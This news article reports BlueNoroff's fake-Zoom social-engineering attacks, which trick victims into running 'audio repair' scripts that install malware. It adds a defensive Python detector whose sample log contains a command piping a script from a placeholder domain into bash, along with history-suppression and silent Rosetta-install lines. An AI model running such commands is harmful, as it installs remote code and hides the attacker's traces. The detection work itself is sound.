Security researchers tracking North Korean state-sponsored hacking activity say a string of recent social engineering attacks targeting Zoom users is the handiwork of BlueNoroff, a Pyongyang-linked APT that targets financial institutions.
The incidents follow a similar pattern: the victim joins a Zoom meeting, experiences audio issues, and is instructed to run malicious extensions or commands that give the attackers full access to their system.
One month ago, Ability AI founder and CEO Eugene Vyborov said he was targeted by such an attempt. After scheduling a meeting, the attackers sent a link to a fake Zoom call that featured deepfake participants.
When Vyborov’s audio was not connecting, he was directed to a fake Zoom help page instructing him to run terminal commands to fix it.
“At that point, I stopped engaging. When I insisted on switching to Google Meet, they pushed back saying ‘company policy’ prevented that. Minutes later, they deleted our entire Telegram chat and vanished,” Vyborov explained.
In late May, an employee of a Canadian online gambling provider fell victim to a similar attack and ended up with infostealer malware on their system, Field Effect reports. The hackers impersonated the victim’s trusted contacts and Zoom.
“During the call, the victim experienced audio issues and multiple pop-up warnings. The other participant then prompted the victim to run a script masquerading as a Zoom audio repair tool,” Field Effect explains.
The script downloaded and executed a secondary script, which asked the victim for their credentials. The attackers used the credentials in subsequent commands, and downloaded and executed an infostealer and a loader for a fully featured malware implant.
The loader attempted to establish persistence for the main malware, while sensitive information, including browser data and user keychain files, was already being exfiltrated from the system.
In early June, an employee at a cryptocurrency foundation was invited to a group Zoom meeting featuring deepfakes of the company’s senior leadership, according to documentation from cybersecurity vendor Huntress.
When the victim experienced microphone issues, the deepfakes instructed them to download a fake Zoom extension and sent a link to it via Telegram.
The extension turned out to be an AppleScript designed to download a payload and execute a script that disabled bash history logging and checked whether Rosetta 2 was installed on the system, silently installing it if not.
As part of the attack, the victim’s system was infected with eight different malicious binaries, identified as the Telegram 2 persistence tool, the Root Troy V4 backdoor, InjectWithDyld (a loader that drops the benign Base App and another payload), the XScreen keylogger, the CryptoBot infostealer, and the NetChk random number generator.
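As an added illustration that is not drawn from the Field Effect or Huntress reports, the following detection pass scans a constructed shell-audit log for the behaviours described above (history suppression, the Rosetta 2 probe or install, and remote-script execution) and flags a user for whom several of them fire together. The log format, rule names, timestamps and the `zoom-fix.example` domain are all assumptions made for this example.

```python
import re

# Constructed sample of a shell-command audit log ("<timestamp> <user> <command>"
# per line); the timestamps, user and domain are invented, not from any incident.
SAMPLE_LOG = """\
2025-06-03T10:12:01Z alice ls -la ~/Downloads
2025-06-03T10:12:09Z alice unset HISTFILE
2025-06-03T10:12:10Z alice /usr/bin/pkgutil --pkg-info com.apple.pkg.RosettaUpdateAuto
2025-06-03T10:12:12Z alice /usr/sbin/softwareupdate --install-rosetta --agree-to-license
2025-06-03T10:12:20Z alice curl -fsSL http://zoom-fix.example/audio.sh | bash
2025-06-03T10:13:00Z alice osascript /tmp/zoom_audio_fix.scpt
2025-06-03T10:14:00Z alice open -a Zoom.us
"""

# Hypothetical detection rules keyed on the tradecraft the reports describe:
# suppressing shell history, probing/installing Rosetta 2, running a fetched script.
RULES = {
    "history_suppression": re.compile(
        r"\b(unset\s+HISTFILE|set\s+\+o\s+history|HISTFILE=/dev/null|history\s+-c)\b"),
    "rosetta2_probe_or_install": re.compile(
        r"(pkgutil\s+--pkg-info\s+com\.apple\.pkg\.RosettaUpdateAuto|softwareupdate\s+--install-rosetta)"),
    "remote_script_execution": re.compile(
        r"(curl|wget)\b.*\|\s*(ba|z)?sh\b|\bosascript\b"),
}

def parse_line(line):
    """Split '<ts> <user> <command>' into a 3-tuple; return None for malformed lines."""
    parts = line.split(" ", 2)
    return tuple(parts) if len(parts) == 3 else None

def scan(log_text):
    """Return (timestamp, user, rule_name, command) for every command matching a rule."""
    hits = []
    for raw in log_text.splitlines():
        parsed = parse_line(raw.strip())
        if not parsed:
            continue  # skip blank or malformed lines rather than crash the scan
        ts, user, cmd = parsed
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits.append((ts, user, name, cmd))
    return hits

def triage(log_text, min_categories=3):
    """Map user -> sorted rule names for users with at least min_categories
    distinct rule categories, i.e. the combination seen in the fake 'audio fix' flow."""
    by_user = {}
    for _ts, user, name, _cmd in scan(log_text):
        by_user.setdefault(user, set()).add(name)
    return {u: sorted(names) for u, names in by_user.items() if len(names) >= min_categories}
```

Any single rule fires on legitimate administration too (installing Rosetta 2 is normal on Apple silicon), so `triage` only raises a user when the categories cluster, which is the signal worth paging on.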
Field Effect and Huntress attributed the attacks they investigated to BlueNoroff, also known as CageyChameleon, Copernicium, Sapphire Sleet, and Stardust Chollima, a North Korean state-sponsored group focused on cryptocurrency theft.
The social engineering technique used in these attacks suggests that BlueNoroff targeted Vyborov as well. Investigating the domain hosting the fake Zoom extension, Validin discovered 200 additional domains likely used by BlueNoroff in similar attacks.